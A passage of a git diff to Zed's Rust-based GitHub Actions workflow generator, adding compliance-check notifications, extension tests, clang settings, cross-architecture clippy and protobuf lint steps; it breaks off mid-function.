{r#" + if [ -z "$COMPLIANCE_OUTCOME" ] || [ "$COMPLIANCE_OUTCOME" == "skipped" ]; then + echo "Compliance check was skipped, not sending notification" + exit 0 + fi + + TAG="$GITHUB_REF_NAME" + + if [ "$COMPLIANCE_OUTCOME" == "success" ]; then + MESSAGE="✅ Post-upload compliance re-check passed for $TAG" + else + MESSAGE="❌ Post-upload compliance re-check failed for $TAG" + fi + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + "#}) + .if_condition(Expression::new("always()")) + .add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + .add_env(( + "COMPLIANCE_OUTCOME", + "${{ steps.run-post-upload-compliance-check.outcome }}", + )) + } + named::job( - dependant_job(deps).runs_on(runners::LINUX_SMALL).add_step( - named::bash(&validation_script).add_env(("GITHUB_TOKEN", vars::GITHUB_TOKEN)), - ), + dependant_job(deps) + .runs_on(runners::LINUX_SMALL) + .add_step(named::bash(&validation_script).add_env(("GITHUB_TOKEN", vars::GITHUB_TOKEN))) + .add_step( + steps::checkout_repo() + .with_full_history() + .with_ref(Context::github().ref_()), + ) + .add_step(steps::cache_rust_dependencies_namespace()) + .add_step(run_post_upload_compliance_check()) + .add_step(send_post_upload_compliance_notification()), ) } fn auto_release_preview(deps: &[&NamedJob]) -> NamedJob { - let (authenticate, token) = steps::authenticate_as_zippy(); + let (authenticate, token) = steps::authenticate_as_zippy().into(); named::job( dependant_job(deps) @@ -255,7 +356,7 @@ fn create_draft_release() -> NamedJob { .add_step( steps::checkout_repo() .with_custom_fetch_depth(25) - .with_ref("${{ github.ref }}"), + .with_ref(Context::github().ref_()), ) .add_step(steps::script("script/determine-release-channel")) .add_step(steps::script("mkdir -p target/")) @@ -272,18 +373,55 @@ pub(crate) fn push_release_update_notification( test_jobs: &[&NamedJob], bundle_jobs: &ReleaseBundleJobs, ) -> NamedJob { - let 
all_job_names = test_jobs - .into_iter() + fn env_name(name: &str) -> String { + format!("RESULT_{}", name.to_uppercase()) + } + + let all_job_names: Vec<&str> = test_jobs + .iter() .map(|j| j.name.as_ref()) - .chain(bundle_jobs.jobs().into_iter().map(|j| j.name.as_ref())); + .chain(bundle_jobs.jobs().into_iter().map(|j| j.name.as_ref())) + .collect(); + + let env_entries = [ + ( + "DRAFT_RESULT".into(), + format!("${{{{ needs.{}.result }}}}", create_draft_release_job.name), + ), + ( + "UPLOAD_RESULT".into(), + format!("${{{{ needs.{}.result }}}}", upload_assets_job.name), + ), + ( + "VALIDATE_RESULT".into(), + format!("${{{{ needs.{}.result }}}}", validate_assets_job.name), + ), + ( + "AUTO_RELEASE_RESULT".into(), + format!("${{{{ needs.{}.result }}}}", auto_release_preview.name), + ), + ("RUN_URL".into(), CURRENT_ACTION_RUN_URL.to_string()), + ] + .into_iter() + .chain( + all_job_names + .iter() + .map(|name| (env_name(name), format!("${{{{ needs.{name}.result }}}}"))), + ); + + let failure_checks = all_job_names + .iter() + .map(|name| { + format!( + "if [ \"${env_name}\" == \"failure\" ];then FAILED_JOBS=\"$FAILED_JOBS {name}\"; fi", + env_name = env_name(name) + ) + }) + .collect::>() + .join("\n "); let notification_script = formatdoc! 
{r#" - DRAFT_RESULT="${{{{ needs.{draft_job}.result }}}}" - UPLOAD_RESULT="${{{{ needs.{upload_job}.result }}}}" - VALIDATE_RESULT="${{{{ needs.{validate_job}.result }}}}" - AUTO_RELEASE_RESULT="${{{{ needs.{auto_release_job}.result }}}}" TAG="$GITHUB_REF_NAME" - RUN_URL="{run_url}" if [ "$DRAFT_RESULT" == "failure" ]; then echo "❌ Draft release creation failed for $TAG: $RUN_URL" @@ -319,19 +457,6 @@ pub(crate) fn push_release_update_notification( fi fi "#, - draft_job = create_draft_release_job.name, - upload_job = upload_assets_job.name, - validate_job = validate_assets_job.name, - auto_release_job = auto_release_preview.name, - run_url = CURRENT_ACTION_RUN_URL, - failure_checks = all_job_names - .into_iter() - .map(|name: &str| format!( - "if [ \"${{{{ needs.{name}.result }}}}\" == \"failure\" ];\ - then FAILED_JOBS=\"$FAILED_JOBS {name}\"; fi" - )) - .collect::>() - .join("\n "), }; let mut all_deps: Vec<&NamedJob> = vec![ @@ -347,7 +472,10 @@ pub(crate) fn push_release_update_notification( .runs_on(runners::LINUX_SMALL) .cond(Expression::new("always()")); - for step in notify_slack(MessageType::Evaluated(notification_script)) { + for step in notify_slack(MessageType::Evaluated { + script: notification_script, + env: env_entries.collect(), + }) { job = job.add_step(step); } named::job(job) @@ -368,14 +496,17 @@ pub(crate) fn notify_on_failure(deps: &[&NamedJob]) -> NamedJob { pub(crate) enum MessageType { Static(String), - Evaluated(String), + Evaluated { + script: String, + env: Vec<(String, String)>, + }, } fn notify_slack(message: MessageType) -> Vec> { match message { MessageType::Static(message) => vec![send_slack_message(message)], - MessageType::Evaluated(expression) => { - let (generate_step, generated_message) = generate_slack_message(expression); + MessageType::Evaluated { script, env } => { + let (generate_step, generated_message) = generate_slack_message(script, env); vec![ generate_step, @@ -385,26 +516,32 @@ fn notify_slack(message: MessageType) 
-> Vec> { } } -fn generate_slack_message(expression: String) -> (Step, StepOutput) { +fn generate_slack_message( + expression: String, + env: Vec<(String, String)>, +) -> (Step, StepOutput) { let script = formatdoc! {r#" MESSAGE=$({expression}) echo "message=$MESSAGE" >> "$GITHUB_OUTPUT" "# }; - let generate_step = named::bash(&script) + let mut generate_step = named::bash(&script) .id("generate-webhook-message") .add_env(("GH_TOKEN", Context::github().token())); + for (name, value) in env { + generate_step = generate_step.add_env((name, value)); + } + let output = StepOutput::new(&generate_step, "message"); (generate_step, output) } fn send_slack_message(message: String) -> Step { - let script = formatdoc! {r#" - curl -X POST -H 'Content-type: application/json'\ - --data '{{"text":"{message}"}}' "$SLACK_WEBHOOK" - "# - }; - named::bash(&script).add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + named::bash( + r#"curl -X POST -H 'Content-type: application/json' --data "$(jq -n --arg text "$SLACK_MESSAGE" '{"text": $text}')" "$SLACK_WEBHOOK""# + ) + .add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + .add_env(("SLACK_MESSAGE", message)) } diff --git a/tooling/xtask/src/tasks/workflows/release_nightly.rs b/tooling/xtask/src/tasks/workflows/release_nightly.rs index bcae94d08d14a76bef82482c1afd707c5a8a4bda..277db38bee6ebe24482d6c91f6bb8966bed9d1d3 100644 --- a/tooling/xtask/src/tasks/workflows/release_nightly.rs +++ b/tooling/xtask/src/tasks/workflows/release_nightly.rs @@ -18,7 +18,7 @@ pub fn release_nightly() -> Workflow { let style = check_style(); // run only on windows as that's our fastest platform right now. 
let tests = run_platform_tests_no_filter(Platform::Windows); - let clippy_job = clippy(Platform::Windows); + let clippy_job = clippy(Platform::Windows, None); let nightly = Some(ReleaseChannel::Nightly); let bundle = ReleaseBundleJobs { diff --git a/tooling/xtask/src/tasks/workflows/run_agent_evals.rs b/tooling/xtask/src/tasks/workflows/run_agent_evals.rs index e83d3a07f079c1f40360f413f3007813dbe552ce..8146552e6567fc336be91e3ad6c0687c441b6604 100644 --- a/tooling/xtask/src/tasks/workflows/run_agent_evals.rs +++ b/tooling/xtask/src/tasks/workflows/run_agent_evals.rs @@ -3,32 +3,10 @@ use serde_json::json; use crate::tasks::workflows::{ runners::{self, Platform}, - steps::{self, FluentBuilder as _, NamedJob, named, setup_cargo_config}, + steps::{self, FluentBuilder as _, NamedJob, named}, vars::{self, WorkflowInput}, }; -pub(crate) fn run_agent_evals() -> Workflow { - let agent_evals = agent_evals(); - let model_name = WorkflowInput::string("model_name", None); - - named::workflow() - .on(Event::default().workflow_dispatch( - WorkflowDispatch::default().add_input(model_name.name, model_name.input()), - )) - .concurrency(vars::one_workflow_per_non_main_branch()) - .add_env(("CARGO_TERM_COLOR", "always")) - .add_env(("CARGO_INCREMENTAL", 0)) - .add_env(("RUST_BACKTRACE", 1)) - .add_env(("ANTHROPIC_API_KEY", vars::ANTHROPIC_API_KEY)) - .add_env(("OPENAI_API_KEY", vars::OPENAI_API_KEY)) - .add_env(("GOOGLE_AI_API_KEY", vars::GOOGLE_AI_API_KEY)) - .add_env(("GOOGLE_CLOUD_PROJECT", vars::GOOGLE_CLOUD_PROJECT)) - .add_env(("ZED_CLIENT_CHECKSUM_SEED", vars::ZED_CLIENT_CHECKSUM_SEED)) - .add_env(("ZED_EVAL_TELEMETRY", 1)) - .add_env(("MODEL_NAME", model_name.to_string())) - .add_job(agent_evals.name, agent_evals.job) -} - pub(crate) fn run_unit_evals() -> Workflow { let model_name = WorkflowInput::string("model_name", None); let commit_sha = WorkflowInput::string("commit_sha", None); @@ -59,29 +37,6 @@ fn add_api_keys(step: Step) -> Step { .add_env(("GOOGLE_CLOUD_PROJECT", 
vars::GOOGLE_CLOUD_PROJECT)) } -fn agent_evals() -> NamedJob { - fn run_eval() -> Step { - named::bash( - "cargo run --package=eval -- --repetitions=8 --concurrency=1 --model \"${MODEL_NAME}\"", - ) - } - - named::job( - Job::default() - .runs_on(runners::LINUX_DEFAULT) - .timeout_minutes(60_u32 * 10) - .add_step(steps::checkout_repo()) - .add_step(steps::cache_rust_dependencies_namespace()) - .map(steps::install_linux_dependencies) - .add_step(setup_cargo_config(Platform::Linux)) - .add_step(steps::setup_sccache(Platform::Linux)) - .add_step(steps::script("cargo build --package=eval")) - .add_step(add_api_keys(run_eval())) - .add_step(steps::show_sccache_stats(Platform::Linux)) - .add_step(steps::cleanup_cargo_config(Platform::Linux)), - ) -} - pub(crate) fn run_cron_unit_evals() -> Workflow { let unit_evals = cron_unit_evals(); @@ -123,7 +78,7 @@ fn cron_unit_evals() -> NamedJob { const UNIT_EVAL_MODELS: &[&str] = &[ "anthropic/claude-sonnet-4-5-latest", "anthropic/claude-opus-4-5-latest", - "google/gemini-3-pro", + "google/gemini-3.1-pro", "openai/gpt-5", ]; diff --git a/tooling/xtask/src/tasks/workflows/run_bundling.rs b/tooling/xtask/src/tasks/workflows/run_bundling.rs index 7fa82e80c52b9e6faec6a377d906269e7a3dbb77..6b9d3b9e36c3ba3b3de4b02a53e83ee4faaa4785 100644 --- a/tooling/xtask/src/tasks/workflows/run_bundling.rs +++ b/tooling/xtask/src/tasks/workflows/run_bundling.rs @@ -146,6 +146,8 @@ pub(crate) fn bundle_linux( job: bundle_job(deps) .runs_on(arch.linux_bundler()) .envs(bundle_envs(platform)) + .add_env(Env::new("CC", "clang-18")) + .add_env(Env::new("CXX", "clang++-18")) .add_step(steps::checkout_repo()) .when_some(release_channel, |job, release_channel| { job.add_step(set_release_channel(platform, release_channel)) diff --git a/tooling/xtask/src/tasks/workflows/run_tests.rs b/tooling/xtask/src/tasks/workflows/run_tests.rs index 8b633edab6d81ad71c31e25c5171af076402fa9d..65b44123c7b76f49e7c349318aab1bc2fb856c1f 100644 --- 
a/tooling/xtask/src/tasks/workflows/run_tests.rs +++ b/tooling/xtask/src/tasks/workflows/run_tests.rs @@ -1,16 +1,21 @@ use gh_workflow::{ - Concurrency, Container, Event, Expression, Job, Port, PullRequest, Push, Run, Step, Use, - Workflow, + Concurrency, Container, Event, Expression, Input, Job, Level, Permissions, Port, PullRequest, + Push, Run, Step, Strategy, Use, UsesJob, Workflow, }; use indexmap::IndexMap; +use indoc::formatdoc; +use serde_json::json; use crate::tasks::workflows::{ - steps::{CommonJobConditions, repository_owner_guard_expression}, + steps::{ + CommonJobConditions, cache_rust_dependencies_namespace, repository_owner_guard_expression, + use_clang, + }, vars::{self, PathCondition}, }; use super::{ - runners::{self, Platform}, + runners::{self, Arch, Platform}, steps::{self, FluentBuilder, NamedJob, named, release_job}, }; @@ -20,9 +25,10 @@ pub(crate) fn run_tests() -> Workflow { // - script/update_top_ranking_issues/ // - .github/ISSUE_TEMPLATE/ // - .github/workflows/ (except .github/workflows/ci.yml) + // - extensions/ (these have their own test workflow) let should_run_tests = PathCondition::inverted( "run_tests", - r"^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))", + r"^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)", ); let should_check_docs = PathCondition::new("run_docs", r"^(docs/|crates/.*\.rs)"); let should_check_scripts = PathCondition::new( @@ -42,9 +48,10 @@ pub(crate) fn run_tests() -> Workflow { let mut jobs = vec![ orchestrate, check_style(), - should_run_tests.guard(clippy(Platform::Windows)), - should_run_tests.guard(clippy(Platform::Linux)), - should_run_tests.guard(clippy(Platform::Mac)), + should_run_tests.guard(clippy(Platform::Windows, None)), + should_run_tests.guard(clippy(Platform::Linux, None)), + should_run_tests.guard(clippy(Platform::Mac, None)), + should_run_tests.guard(clippy(Platform::Mac, 
Some(Arch::X86_64))), should_run_tests.guard(run_platform_tests(Platform::Windows)), should_run_tests.guard(run_platform_tests(Platform::Linux)), should_run_tests.guard(run_platform_tests(Platform::Mac)), @@ -56,7 +63,8 @@ pub(crate) fn run_tests() -> Workflow { should_check_licences.guard(check_licenses()), should_check_scripts.guard(check_scripts()), ]; - let tests_pass = tests_pass(&jobs); + let ext_tests = extension_tests(); + let tests_pass = tests_pass(&jobs, &[&ext_tests.name]); jobs.push(should_run_tests.guard(check_postgres_and_protobuf_migrations())); // could be more specific here? @@ -87,20 +95,32 @@ pub(crate) fn run_tests() -> Workflow { } workflow }) + .add_job(ext_tests.name, ext_tests.job) .add_job(tests_pass.name, tests_pass.job) } +/// Controls which features `orchestrate_impl` includes in the generated script. +#[derive(PartialEq, Eq)] +enum OrchestrateTarget { + /// For the main Zed repo: includes the cargo package filter and extension + /// change detection, but no working-directory scoping. + ZedRepo, + /// For individual extension repos: scopes changed-file detection to the + /// working directory, with no package filter or extension detection. 
+ Extension, +} + // Generates a bash script that checks changed files against regex patterns // and sets GitHub output variables accordingly pub fn orchestrate(rules: &[&PathCondition]) -> NamedJob { - orchestrate_impl(rules, true) + orchestrate_impl(rules, OrchestrateTarget::ZedRepo) } -pub fn orchestrate_without_package_filter(rules: &[&PathCondition]) -> NamedJob { - orchestrate_impl(rules, false) +pub fn orchestrate_for_extension(rules: &[&PathCondition]) -> NamedJob { + orchestrate_impl(rules, OrchestrateTarget::Extension) } -fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> NamedJob { +fn orchestrate_impl(rules: &[&PathCondition], target: OrchestrateTarget) -> NamedJob { let name = "orchestrate".to_owned(); let step_name = "filter".to_owned(); let mut script = String::new(); @@ -115,8 +135,24 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N git fetch origin "$GITHUB_BASE_REF" --depth=350 COMPARE_REV="$(git merge-base "origin/${GITHUB_BASE_REF}" HEAD)" fi - CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" ${{ github.sha }})" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + + "#}); + + if target == OrchestrateTarget::Extension { + script.push_str(indoc::indoc! {r#" + # When running from a subdirectory, git diff returns repo-root-relative paths. + # Filter to only files within the current working directory and strip the prefix. + REPO_SUBDIR="$(git rev-parse --show-prefix)" + REPO_SUBDIR="${REPO_SUBDIR%/}" + if [ -n "$REPO_SUBDIR" ]; then + CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)" + fi + + "#}); + } + script.push_str(indoc::indoc! 
{r#" check_pattern() { local output_name="$1" local pattern="$2" @@ -131,7 +167,7 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N let mut outputs = IndexMap::new(); - if include_package_filter { + if target == OrchestrateTarget::ZedRepo { script.push_str(indoc::indoc! {r#" # Check for changes that require full rebuild (no filter) # Direct pushes to main/stable/preview always run full suite @@ -217,6 +253,16 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N )); } + if target == OrchestrateTarget::ZedRepo { + script.push_str(DETECT_CHANGED_EXTENSIONS_SCRIPT); + script.push_str("echo \"changed_extensions=$EXTENSIONS_JSON\" >> \"$GITHUB_OUTPUT\"\n"); + + outputs.insert( + "changed_extensions".to_owned(), + format!("${{{{ steps.{}.outputs.changed_extensions }}}}", step_name), + ); + } + let job = Job::default() .runs_on(runners::LINUX_SMALL) .with_repository_owner_guard() @@ -227,7 +273,7 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N NamedJob { name, job } } -pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob { +pub fn tests_pass(jobs: &[NamedJob], extra_job_names: &[&str]) -> NamedJob { let mut script = String::from(indoc::indoc! 
{r#" set +x EXIT_CODE=0 @@ -239,15 +285,26 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob { "#}); + let all_names: Vec<&str> = jobs + .iter() + .map(|job| job.name.as_str()) + .chain(extra_job_names.iter().copied()) + .collect(); + + let env_entries: Vec<_> = all_names + .iter() + .map(|name| { + let env_name = format!("RESULT_{}", name.to_uppercase()); + let env_value = format!("${{{{ needs.{}.result }}}}", name); + (env_name, env_value) + }) + .collect(); + script.push_str( - &jobs + &all_names .iter() - .map(|job| { - format!( - "check_result \"{}\" \"${{{{ needs.{}.result }}}}\"", - job.name, job.name - ) - }) + .zip(env_entries.iter()) + .map(|(name, (env_name, _))| format!("check_result \"{}\" \"${}\"", name, env_name)) .collect::>() .join("\n"), ); @@ -257,16 +314,70 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob { let job = Job::default() .runs_on(runners::LINUX_SMALL) .needs( - jobs.iter() - .map(|j| j.name.to_string()) + all_names + .iter() + .map(|name| name.to_string()) .collect::>(), ) .cond(repository_owner_guard_expression(true)) - .add_step(named::bash(&script)); + .add_step( + env_entries + .into_iter() + .fold(named::bash(&script), |step, env_item| { + step.add_env(env_item) + }), + ); named::job(job) } +/// Bash script snippet that detects changed extension directories from `$CHANGED_FILES`. +/// Assumes `$CHANGED_FILES` is already set. Sets `$EXTENSIONS_JSON` to a JSON array of +/// changed extension paths. Callers are responsible for writing the result to `$GITHUB_OUTPUT`. +pub(crate) const DETECT_CHANGED_EXTENSIONS_SCRIPT: &str = indoc::indoc! 
{r#" + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + # Filter out deleted extensions + EXISTING_EXTENSIONS="" + for ext in $CHANGED_EXTENSIONS; do + if [ -f "$ext/extension.toml" ]; then + EXISTING_EXTENSIONS=$(printf '%s\n%s' "$EXISTING_EXTENSIONS" "$ext") + fi + done + CHANGED_EXTENSIONS=$(echo "$EXISTING_EXTENSIONS" | sed '/^$/d') + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi +"#}; + +const TS_QUERY_LS_FILE: &str = "ts_query_ls-x86_64-unknown-linux-gnu.tar.gz"; +const CI_TS_QUERY_RELEASE: &str = "tags/v3.15.1"; + +pub(crate) fn fetch_ts_query_ls() -> Step { + named::uses( + "dsaltares", + "fetch-gh-release-asset", + "aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c", + ) // v1.1.1 + .add_with(("repo", "ribru17/ts_query_ls")) + .add_with(("version", CI_TS_QUERY_RELEASE)) + .add_with(("file", TS_QUERY_LS_FILE)) +} + +pub(crate) fn run_ts_query_ls() -> Step { + named::bash(formatdoc!( + r#"tar -xf "$GITHUB_WORKSPACE/{TS_QUERY_LS_FILE}" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || {{ + echo "Found unformatted queries, please format them with ts_query_ls." 
+ echo "For easy use, install the Tree-sitter query extension:" + echo "zed://extension/tree-sitter-query" + false + }}"# + )) +} + fn check_style() -> NamedJob { fn check_for_typos() -> Step { named::uses( @@ -276,6 +387,7 @@ fn check_style() -> NamedJob { ) // v1.40.0 .with(("config", "./typos.toml")) } + named::job( release_job(&[]) .runs_on(runners::LINUX_MEDIUM) @@ -286,7 +398,9 @@ fn check_style() -> NamedJob { .add_step(steps::cargo_fmt()) .add_step(steps::script("./script/check-todos")) .add_step(steps::script("./script/check-keymaps")) - .add_step(check_for_typos()), + .add_step(check_for_typos()) + .add_step(fetch_ts_query_ls()) + .add_step(run_ts_query_ls()), ) } @@ -324,7 +438,7 @@ fn check_dependencies() -> NamedJob { .with(("license-check", false)) } - named::job( + named::job(use_clang( release_job(&[]) .runs_on(runners::LINUX_SMALL) .add_step(steps::checkout_repo()) @@ -333,7 +447,7 @@ fn check_dependencies() -> NamedJob { .add_step(run_cargo_machete()) .add_step(check_cargo_lock()) .add_step(check_vulnerable_dependencies()), - ) + )) } fn check_wasm() -> NamedJob { @@ -369,7 +483,7 @@ fn check_wasm() -> NamedJob { } fn check_workspace_binaries() -> NamedJob { - named::job( + named::job(use_clang( release_job(&[]) .runs_on(runners::LINUX_LARGE) .add_step(steps::checkout_repo()) @@ -381,33 +495,46 @@ fn check_workspace_binaries() -> NamedJob { .add_step(steps::script("cargo build --workspace --bins --examples")) .add_step(steps::show_sccache_stats(Platform::Linux)) .add_step(steps::cleanup_cargo_config(Platform::Linux)), - ) + )) } -pub(crate) fn clippy(platform: Platform) -> NamedJob { +pub(crate) fn clippy(platform: Platform, arch: Option) -> NamedJob { + let target = arch.map(|arch| match (platform, arch) { + (Platform::Mac, Arch::X86_64) => "x86_64-apple-darwin", + (Platform::Mac, Arch::AARCH64) => "aarch64-apple-darwin", + _ => unimplemented!("cross-arch clippy not supported for {platform}/{arch}"), + }); let runner = match platform { 
Platform::Windows => runners::WINDOWS_DEFAULT, Platform::Linux => runners::LINUX_DEFAULT, Platform::Mac => runners::MAC_DEFAULT, }; - NamedJob { - name: format!("clippy_{platform}"), - job: release_job(&[]) - .runs_on(runner) - .add_step(steps::checkout_repo()) - .add_step(steps::setup_cargo_config(platform)) - .when( - platform == Platform::Linux || platform == Platform::Mac, - |this| this.add_step(steps::cache_rust_dependencies_namespace()), - ) - .when( - platform == Platform::Linux, - steps::install_linux_dependencies, - ) - .add_step(steps::setup_sccache(platform)) - .add_step(steps::clippy(platform)) - .add_step(steps::show_sccache_stats(platform)), + let mut job = release_job(&[]) + .runs_on(runner) + .add_step(steps::checkout_repo()) + .add_step(steps::setup_cargo_config(platform)) + .when( + platform == Platform::Linux || platform == Platform::Mac, + |this| this.add_step(steps::cache_rust_dependencies_namespace()), + ) + .when( + platform == Platform::Linux, + steps::install_linux_dependencies, + ) + .when_some(target, |this, target| { + this.add_step(steps::install_rustup_target(target)) + }) + .add_step(steps::setup_sccache(platform)) + .add_step(steps::clippy(platform, target)) + .add_step(steps::show_sccache_stats(platform)); + if platform == Platform::Linux { + job = use_clang(job); } + let name = match arch { + Some(arch) => format!("clippy_{platform}_{arch}"), + None => format!("clippy_{platform}"), + }; + NamedJob { name, job } } pub(crate) fn run_platform_tests(platform: Platform) -> NamedJob { @@ -444,10 +571,12 @@ fn run_platform_tests_impl(platform: Platform, filter_packages: bool) -> NamedJo }) .add_step(steps::checkout_repo()) .add_step(steps::setup_cargo_config(platform)) - .when( - platform == Platform::Linux || platform == Platform::Mac, - |this| this.add_step(steps::cache_rust_dependencies_namespace()), - ) + .when(platform == Platform::Mac, |this| { + this.add_step(steps::cache_rust_dependencies_namespace()) + }) + .when(platform == 
Platform::Linux, |this| { + use_clang(this.add_step(steps::cache_rust_dependencies_namespace())) + }) .when( platform == Platform::Linux, steps::install_linux_dependencies, @@ -467,6 +596,9 @@ fn run_platform_tests_impl(platform: Platform, filter_packages: bool) -> NamedJo .when(!filter_packages, |job| { job.add_step(steps::cargo_nextest(platform)) }) + .when(platform == Platform::Mac, |job| { + job.add_step(steps::cargo_build_visual_tests()) + }) .add_step(steps::show_sccache_stats(platform)) .add_step(steps::cleanup_cargo_config(platform)), } @@ -497,6 +629,14 @@ pub(crate) fn check_postgres_and_protobuf_migrations() -> NamedJob { .add_with(("against", "https://github.com/${GITHUB_REPOSITORY}.git#branch=${BUF_BASE_BRANCH},subdir=crates/proto/proto/")) } + fn buf_lint() -> Step { + named::bash("buf lint crates/proto/proto") + } + + fn check_protobuf_formatting() -> Step { + named::bash("buf format --diff --exit-code crates/proto/proto") + } + named::job( release_job(&[]) .runs_on(runners::LINUX_DEFAULT) @@ -507,7 +647,9 @@ pub(crate) fn check_postgres_and_protobuf_migrations() -> NamedJob { .add_step(steps::checkout_repo().with_full_history()) .add_step(ensure_fresh_merge()) .add_step(bufbuild_setup_action()) - .add_step(bufbuild_breaking_action()), + .add_step(bufbuild_breaking_action()) + .add_step(buf_lint()) + .add_step(check_protobuf_formatting()), ) } @@ -519,7 +661,7 @@ fn doctests() -> NamedJob { .id("run_doctests") } - named::job( + named::job(use_clang( release_job(&[]) .runs_on(runners::LINUX_DEFAULT) .add_step(steps::checkout_repo()) @@ -530,7 +672,7 @@ fn doctests() -> NamedJob { .add_step(run_doctests()) .add_step(steps::show_sccache_stats(Platform::Linux)) .add_step(steps::cleanup_cargo_config(Platform::Linux)), - ) + )) } fn check_licenses() -> NamedJob { @@ -572,7 +714,7 @@ fn check_docs() -> NamedJob { "#}) } - named::job( + named::job(use_clang( release_job(&[]) .runs_on(runners::LINUX_LARGE) .add_step(steps::checkout_repo()) @@ -589,7 +731,7 @@ 
fn check_docs() -> NamedJob { .add_step( lychee_link_check("target/deploy/docs"), // check links in generated html ), - ) + )) } pub(crate) fn check_scripts() -> NamedJob { @@ -600,9 +742,10 @@ pub(crate) fn check_scripts() -> NamedJob { } fn run_actionlint() -> Step { - named::bash(indoc::indoc! {r#" - ${{ steps.get_actionlint.outputs.executable }} -color - "#}) + named::bash(r#""$ACTIONLINT_BIN" -color"#).add_env(( + "ACTIONLINT_BIN", + "${{ steps.get_actionlint.outputs.executable }}", + )) } fn run_shellcheck() -> Step { @@ -627,6 +770,30 @@ pub(crate) fn check_scripts() -> NamedJob { .add_step(run_shellcheck()) .add_step(download_actionlint().id("get_actionlint")) .add_step(run_actionlint()) + .add_step(cache_rust_dependencies_namespace()) .add_step(check_xtask_workflows()), ) } + +fn extension_tests() -> NamedJob { + let job = Job::default() + .needs(vec!["orchestrate".to_owned()]) + .cond(Expression::new( + "needs.orchestrate.outputs.changed_extensions != '[]'", + )) + .permissions(Permissions::default().contents(Level::Read)) + .strategy( + Strategy::default() + .fail_fast(false) + // TODO: Remove the limit. We currently need this to workaround the concurrency group issue + // where different matrix jobs would be placed in the same concurrency group and thus cancelled. 
+ .max_parallel(1u32) + .matrix(json!({ + "extension": "${{ fromJson(needs.orchestrate.outputs.changed_extensions) }}" + })), + ) + .uses_local(".github/workflows/extension_tests.yml") + .with(Input::default().add("working-directory", "${{ matrix.extension }}")); + + named::job(job) +} diff --git a/tooling/xtask/src/tasks/workflows/steps.rs b/tooling/xtask/src/tasks/workflows/steps.rs index 8220d8311ff7ee0ee3a955dabacb067701bb8d51..15c2614ada81dd7c2e772f52c7072dac4324d1dc 100644 --- a/tooling/xtask/src/tasks/workflows/steps.rs +++ b/tooling/xtask/src/tasks/workflows/steps.rs @@ -1,11 +1,20 @@ use gh_workflow::*; use serde_json::Value; -use crate::tasks::workflows::{runners::Platform, vars, vars::StepOutput}; +use crate::tasks::workflows::{ + runners::Platform, + steps::named::function_name, + vars::{self, StepOutput}, +}; + +pub(crate) fn use_clang(job: Job) -> Job { + job.add_env(Env::new("CC", "clang")) + .add_env(Env::new("CXX", "clang++")) +} const SCCACHE_R2_BUCKET: &str = "sccache-zed"; -const BASH_SHELL: &str = "bash -euxo pipefail {0}"; +pub(crate) const BASH_SHELL: &str = "bash -euxo pipefail {0}"; // https://docs.github.com/en/actions/reference/workflows-and-actions/workflow-syntax#jobsjob_idstepsshell pub const PWSH_SHELL: &str = "pwsh"; @@ -19,13 +28,6 @@ pub(crate) fn cargo_nextest(platform: Platform) -> Nextest { } impl Nextest { - pub(crate) fn with_target(mut self, target: &str) -> Step { - if let Some(nextest_command) = self.0.value.run.as_mut() { - nextest_command.push_str(&format!(r#" --target "{target}""#)); - } - self.into() - } - #[allow(dead_code)] pub(crate) fn with_filter_expr(mut self, filter_expr: &str) -> Self { if let Some(nextest_command) = self.0.value.run.as_mut() { @@ -116,7 +118,7 @@ impl From for Step { .uses( "actions", "checkout", - "11bd71901bbe5b1630ceea73d27597364c9af683", // v4 + "93cb6efe18208431cddfb8368fd83d5badbf9bfd", // v5.0.1 ) // prevent checkout action from running `git clean -ffdx` which // would delete the target 
directory @@ -126,22 +128,12 @@ impl From for Step { FetchDepth::Full => step.add_with(("fetch-depth", 0)), FetchDepth::Custom(depth) => step.add_with(("fetch-depth", depth)), }) - .map(|step| match value.token { - Some(token) => step.add_with(("token", token)), - None => step, - }) - .map(|step| match value.path { - Some(path) => step.add_with(("path", path)), - None => step, - }) - .map(|step| match value.repository { - Some(repository) => step.add_with(("repository", repository)), - None => step, - }) - .map(|step| match value.ref_ { - Some(ref_) => step.add_with(("ref", ref_)), - None => step, + .when_some(value.path, |step, path| step.add_with(("path", path))) + .when_some(value.repository, |step, repository| { + step.add_with(("repository", repository)) }) + .when_some(value.ref_, |step, ref_| step.add_with(("ref", ref_))) + .when_some(value.token, |step, token| step.add_with(("token", token))) } } @@ -185,7 +177,11 @@ pub fn cargo_fmt() -> Step { } pub fn cargo_install_nextest() -> Step { - named::uses("taiki-e", "install-action", "nextest") + named::uses( + "taiki-e", + "install-action", + 